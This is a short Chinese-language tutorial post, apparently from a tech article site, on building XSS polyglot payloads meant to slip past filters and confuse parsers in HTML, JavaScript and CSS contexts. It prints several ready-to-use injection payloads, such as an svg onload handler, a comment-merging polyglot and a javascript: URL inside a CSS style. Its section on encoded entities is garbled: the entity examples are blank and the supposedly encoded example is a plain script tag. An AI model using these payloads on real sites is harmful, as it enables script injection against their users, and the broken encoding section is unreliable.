创建强大的 XSS 多语言

多语言有效负载利用多种编码、注入和混淆技术来绕过过滤器、混淆解析器，并跨不同上下文（如 html、javascript、css、json 等）触发执行。

-合并评论样式
多语言者经常通过合并不同的注释风格来混淆解析器：

javascript: //, /* */
html: <!-- -->

<!--<script>/*--><svg onload="alert(1)/*</script">-->
</svg>

-使用编码实体
使用 html 或 url 编码绕过过滤器：

html: , "
url: %3c, %3e, %22

<script>alert(1)</script>

-多语言环境
多语言负载可跨多种语言工作，例如 html、javascript、css。

"><svg onload="alert(1)" style="background:url(javascript:alert(1))"></svg>

以上就是创建强大的 XSS 多语言的详细内容，更多请关注www.sxiaw.com其它相关文章！